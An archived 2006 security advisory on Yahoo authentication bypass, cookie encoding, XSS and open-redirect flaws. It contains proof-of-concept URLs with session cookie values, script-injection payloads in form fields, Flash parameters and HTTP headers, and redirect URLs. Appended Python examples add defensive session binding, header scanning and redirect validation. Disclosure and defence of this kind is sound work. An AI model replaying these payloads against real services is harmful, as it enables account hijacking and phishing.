Full Disclosure mailing list archives
Yahoo Multiple vulnerabilities (Authentication Bypass, Session Binding, Cookie Encoding Security Weakness, Cross-Site Scripting and URL Redirection)
From: Rajesh Sethumadhavan <rajesh.sethumadhavan () yahoo com>
Date: Tue, 20 Jun 2006 04:09:01 -0700 (PDT)
############################################################################
#
# XDisclose Advisory    : XD100001
# Advisory Released     : 20th June 06
# Credit                : Rajesh Sethumadhavan
#
# Class                 : Authentication Bypass
#                         Session Binding Vulnerability
#                         Cookies Encoding Security Weakness
#                         Cross-Site Scripting
#                         URL redirection
# Severity              : Medium
# Solution Status       : Unpatched
# Vendor                : Yahoo
# Affected applications : Yahoo multiple web-based services
#
############################################################################

Overview:

Yahoo! Inc. is an American computer services company with a mission to "be the most essential global Internet service for consumers and businesses". It operates an Internet portal, including the popular Yahoo! Mail. According to Web trends, Yahoo! is the most visited website on the Internet today, with more than 400 million unique users. The global network of Yahoo! websites received 3.4 billion page views per day on average as of October 2005.

Various Yahoo! services are vulnerable to authentication bypass, session binding, weak cookie encoding, cross-site scripting, file inclusion and URL redirection vulnerabilities, caused by improper validation of user-supplied input.

Description:

Multiple vulnerabilities exist in various Yahoo services.

1. Authentication Bypass and Session Binding Vulnerability.

A malicious user can log on to Yahoo without submitting the username and password by constructing a malicious URL using cookies. The same session (URL) can be used to log in multiple times from multiple IP addresses, leading to a session binding vulnerability.

POC:
--------------------------------------------------------------------------
http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11%26l=i42.j4ij/o&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http%3a//mail.yahoo.com
--------------------------------------------------------------------------
http://msg.edit.yahoo.com/config/reset_cookies?&.y=Y=v=1%26n=0kvgvgv3qlf11%26l=i42.j4ij/o%26p=m2gvvind12000700&.t=T=sk=DAAXxtibJfco8U%26d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFYazdsRUJnV0E-&.done=http%3a//mail.yahoo.com
--------------------------------------------------------------------------
Where "sk" and "d" are the session.

Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo! Auth Bypass.png

2. Cookie Encoding Security Weakness

The implementation of cookies in Yahoo is so weak that they can be decoded easily. A malicious attacker can easily collect personal information from the cookies, such as year of birth, zipcode, country and name, which can be used to obtain the password through "Yahoo forgot password".

Where
  sk & d  is session
  n       is password
  l       is username
  p       is country, year of birth, gender and more
  b       is cookies created
  lg      is language
  intl    is international language
  iz      is zipcode
  jb      is Industry and title

POC Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo Cookie Encoding.png

3. Cross-Site Scripting.

This vulnerability results from the failure of the Yahoo! filtering engine to block certain user-supplied inputs.

a) Yahoo Calendar Service XSS

The flaws are due to improper sanitization of inputs passed to "Location", "Address", "Street" and "Phone".
========================================================================
This event repeats every day.
</font><br>
<font face="Arial" size=-1>
<b>Event Location</b>: <script>alert('Location')</script>
<br><b>Street</b>: <script>alert('Address')</script>
<br><b>City, State, Zip</b>: <script>alert('Street')</script>
<br><b>Phone</b>: <script>alert('Phone')</script>
</font><br>
========================================================================
Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Calendar location.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Address.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Street.png
http://www.xdisclose.bravehost.com/Images/XSS Calendar Phone.png

b) Yahoo Options Mail Account XSS

The flaws are due to improper sanitization of inputs passed to the "Name" and "Reply to" parameters.
========================================================================
<tr valign="top">
<td>Name:</td>
<td><script>alert('Name')</script></td>
</tr>
<tr valign="top">
<td>Email:</td>
<td>sec.test () yahoo com</td>
</tr>
<tr valign="top">
<td>Reply-To:</td>
<td><script>alert('Reply')</script>@yah.com</td>
</tr>
========================================================================
Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Mail Account Reply.png
http://www.xdisclose.bravehost.com/Images/XSS Mail Account Name.png

c) Yahoo Options Filter XSS.

The flaws are due to improper sanitization of inputs passed to the "From" and "To" parameters.
========================================================================
<b>From</b> contains "<b><script>alert('From')</script>@yahoo.com</b>" <br>
<b>To/CC</b> contains "<b><script>alert('To')</script>@yahoo.com</b>" <br>
========================================================================
Screenshot:
http://www.xdisclose.bravehost.com/Images/Xss Filter From.png
http://www.xdisclose.bravehost.com/Images/Xss Filter To.png

d) Yahoo Ads flash file XSS.

The flaws are due to improper sanitization of inputs passed to flash Ads files.

Exploit:
-----------------------------------------------------------------------
http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/20060330_68006_asker1_sound.swf?clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/a/ya/yahoo_answers/20060330_68006_1_425x600_monster_morph_asker_1_check.swf?clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/042406_68946_v1_728x90_super_nup_fun.swf?clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/042406_68946_v1_425x600_mon_nup_mplace.swf?clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://ad.ie.doubleclick.net/812666/specsavers_2for1euro_300x250.swf?clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a1.yimg.com/us.yimg.com/i/ccs/nup/a/042406_68946_v1_728x90_super_nup_sit.swf?clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_messenger/20051028_61760_2_425x600_mon_scarehim.swf?clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
http://us.a2.yimg.com/us.yimg.com/a/ya/yahoo_mail/20060512_65459_1_360x100_mwa1_mail_accolades.swf?clickTAG=javascript:alert('XSS%20Possiable%20in%20Yahoo%20Ads%20\n%20By%20Rajesh')
and more
-----------------------------------------------------------------------
Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS Flash Ads.png

e) Yahoo Mail Beta HTTP Header XSS

The flaws are due to improper sanitization of inputs passed in all HTTP headers, such as Accept, Accept-Charset, Accept-Language, Cache-Control, Connection, Content-Length, Content-Type, Cookie, Keep-Alive, Pragma, SOAPAction and User-Agent, in Yahoo Mail Beta.

POC :
========================================================================
GET : http://uk.f555.mail.yahoo.com/ymws?m=ListFolders&wssid=CKyO7/zcUU2
Host: uk.f555.mail.yahoo.com
User-Agent: <script>alert('User-Agent:')</script>
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5;<script>alert('Accept:')</script>
Accept-Language: en-us,en;q=0.5;<script>alert('Accept-Language:')</script>
Accept-Encoding: gzip,deflate;<script>alert('Accept-Encoding:')</script>
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7;<script>alert('Accept-Charset:')</script>
Keep-Alive: 300;<script>alert('Keep-Alive:')</script>
Connection: keep-alive;<script>alert('Connection:')</script>
SOAPAction: urn:yahoo:ymws#ListFolders;<script>alert('SOAPAction:')</script>
Content-Length: <script>alert('Content-Length:')</script>
Content-Type: application/xml;<script>alert('Content-Type:')</script>
Cookie: B=dcnl4j129c7tu&b=3&s=j3; F=a=aNqy1CosvW3BmaGno6BSLOpXkP2PCglCZ3_LDJtts8oaitnkGkgOOjxwPKS6&b=bIpq; Y=v=1&n=0kvgvgv3qlf11&l=i42.j4ij/o&p=m2gvvind12000700&jb=19|24|&iz=123456 r=g4&lg=uk&intl=uk&np=1;PH=fn=eIhKKoq4dTG7Gjr4FtHqCTA-; T=z=W/hlEBWF3lEBrRcLnJGLZKoMjIyBjUyNjU2NE9OMzI-&a=QAE&sk=DAAZ7oQuYalSuV&d=c2wBTlRVMUFUSTFNVEl4TXpnNU5EVS0BYQFRQUUBdGlwAVNQZHhvQgF6egFXL2hsRUJnV0E-; U=mt=7lM5FJ2MhYo0WJ.pqDZdpFIY1pCQZRq2Q6ftdw--&ux=W/hlEB&un=0kvgvgv3qlf11; YM.dpref1=sec.test%3Aspp%257C1;<script>alert('Cookie:')</script>
Pragma: no-cache;<script>alert('Pragma:')</script>
Cache-Control: no-cache;<script>alert('Cache-Control:')</script>
========================================================================
Screenshot:
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Charset.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Accept-Language.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cache-Control.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Connection.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Length.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Content-Type.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Cookie.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Keep-Alive.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta Pragma.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta SoapAction.png
http://www.xdisclose.bravehost.com/Images/XSS MailBeta User-Agent.png

Impact:

Successful exploitation allows execution of arbitrary script code in a user's browser session in the context of an affected site, which may allow an attacker to steal cookie-based authentication credentials.

4. URL redirection.

This is due to a failure to filter incoming untrusted data before the content reaches users. It can be exploited for phishing attacks. The vulnerable parameters are Yahoo search web, image, video, preferences, cache, Yahoo answers and more URLs containing /*http://yahoo.com or /**http://yahoo.com.

Exploit:
---------------------------------------------------------------------------
http://rds.yahoo.com/_ylt=Ah0geusyaM2xEzqMAjS9XNyoA/SIG=11do5qdq6/EXP=1148028186/**http%3a//www.xdisclose.com
http://search.yahoo.com/preferences/preferences?pref_done=http%3a//www.xdisclose.com
---------------------------------------------------------------------------
Screenshot:
http://www.xdisclose.bravehost.com/Images/URL Redirection WebSearch.png
http://www.xdisclose.bravehost.com/Images/URL Redirection Images.png
http://www.xdisclose.bravehost.com/Images/URL Redirection Video.png

5. Interesting facts about Yahoo

Yahoo Mail Inbox shows a wrong unread message count if there are more than 65535 unread messages.

Screenshot:
http://www.xdisclose.bravehost.com/Images/Yahoo Inbox.png

Original Advisory:
http://www.xdisclose.com/XD100001.txt

Credits:
Rajesh Sethumadhavan has been credited with the discovery of these vulnerabilities.

Disclaimer:
This entire document is strictly for educational, testing and demonstration purposes only. Modification, use and/or publishing of this information is entirely at your own risk. The exploit code is to be used on your own email account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
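Section 1 above describes a session that is minted from URL-supplied cookie values and then accepted from any number of IP addresses. The following is an added example (not code from the advisory or from Yahoo) of the server-side check that closes that gap: tokens are random rather than derived from account data, and each one is bound to the client context it was issued to; the IP/User-Agent fingerprint and the in-memory store are assumptions for the demonstration.

```python
import hashlib
import hmac
import secrets
import time


class SessionStore:
    """In-memory session store that binds every token to the client it was issued to."""

    def __init__(self, ttl_seconds=3600):
        self.ttl = ttl_seconds
        self._sessions = {}  # token -> (user, client fingerprint, expiry timestamp)

    @staticmethod
    def _fingerprint(client_ip, user_agent):
        # Store a hash of the client context rather than the raw IP and UA string.
        return hashlib.sha256(f"{client_ip}|{user_agent}".encode()).hexdigest()

    def issue(self, user, client_ip, user_agent):
        # 256 bits from the OS CSPRNG: nothing about the account (username,
        # password, profile fields) is recoverable from the token itself.
        token = secrets.token_urlsafe(32)
        expires_at = time.time() + self.ttl
        self._sessions[token] = (user, self._fingerprint(client_ip, user_agent), expires_at)
        return token

    def validate(self, token, client_ip, user_agent):
        """Return the user for a valid token, or None if the token is unknown,
        expired, or presented from a client other than the one it was issued to."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, bound_fp, expires_at = entry
        if time.time() > expires_at:
            self._sessions.pop(token, None)
            return None
        presented_fp = self._fingerprint(client_ip, user_agent)
        if not hmac.compare_digest(bound_fp, presented_fp):
            # The token was replayed from a different client: treat it as
            # compromised and revoke it, so the original holder is logged out too.
            self._sessions.pop(token, None)
            return None
        return user
```

Binding to the client IP breaks legitimate users behind rotating NAT or mobile carriers, so production systems usually bind to a more stable signal or alert on the mismatch rather than revoking outright.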
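Sections 3a and 3e above show calendar fields and request headers being echoed into the page unescaped. As an added example (not from the advisory), the code below does the two things a defender needs on that path: a detector that flags which request headers carry HTML markup, run over a constructed request in the shape of the 3e POC, and an output encoder that renders a field the way the 3a markup does but with the value HTML-escaped. The sample request and the hostname in it are constructed for the example.

```python
import html
import re

# Any HTML tag inside a value that should be plain text (header, form field).
_TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z][^>]*>")

# Constructed request in the shape of the Mail Beta POC; two headers carry markup.
SAMPLE_REQUEST = (
    "GET /ymws?m=ListFolders HTTP/1.1\r\n"
    "Host: mail.example.test\r\n"
    "User-Agent: <script>alert('User-Agent:')</script>\r\n"
    "Accept-Language: en-us,en;q=0.5\r\n"
    "Accept-Encoding: gzip,deflate;<script>alert('Accept-Encoding:')</script>\r\n"
    "Pragma: no-cache\r\n"
    "\r\n"
)


def parse_headers(raw_request):
    """Split a raw HTTP request (request line plus headers) into {name: value}."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def flag_tagged_headers(raw_request):
    """Names of headers whose value contains HTML tags, sorted; useful both as a
    WAF/log rule and as a unit test that no such value reaches a template raw."""
    return sorted(n for n, v in parse_headers(raw_request).items() if _TAG_RE.search(v))


def render_field(label, value):
    """Build the '<b>Label</b>: value<br>' fragment from section 3a with the
    value (and label) HTML-escaped, so markup in it is displayed, not executed."""
    return f"<b>{html.escape(label)}</b>: {html.escape(value, quote=True)}<br>"
```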
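The redirection issue in section 4 comes from accepting any destination in `.done`, `pref_done` or after `/**`. As an added example (not the advisory's or Yahoo's code), this validator shows the allow-list check a redirect endpoint should apply to that value before issuing the Location header; the allowed domain list and the "/" fallback are assumptions for the demonstration.

```python
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"yahoo.com"}          # exact hosts permitted as a destination
ALLOWED_SUFFIXES = (".yahoo.com",)     # any subdomain of these is permitted
FALLBACK = "/"                          # same-origin landing page when rejected


def safe_redirect_target(raw, fallback=FALLBACK):
    """Return `raw` (percent-decoded) if it is a same-origin path or an http(s)
    URL on an allowed host; otherwise return the fallback. The parameter is
    percent-decoded once because the POC passes it as http%3a//...."""
    if raw is None:
        return fallback
    target = unquote(raw).strip()
    # Backslashes and control characters are normalised differently by browsers
    # and by urlsplit, so refuse them rather than guess.
    if target == "" or any(c in target for c in "\\\r\n\t"):
        return fallback
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative path: a single leading "/" only; "//host" is a network-path
        # reference that browsers resolve to another origin.
        if target.startswith("/") and not target.startswith("//"):
            return target
        return fallback
    # Absolute URL: only http(s), and never userinfo ("allowed.host@evil").
    if parts.scheme not in ("http", "https") or "@" in parts.netloc:
        return fallback
    host = (parts.hostname or "").lower()
    if host in ALLOWED_HOSTS or any(host.endswith(s) for s in ALLOWED_SUFFIXES):
        return target
    return fallback
```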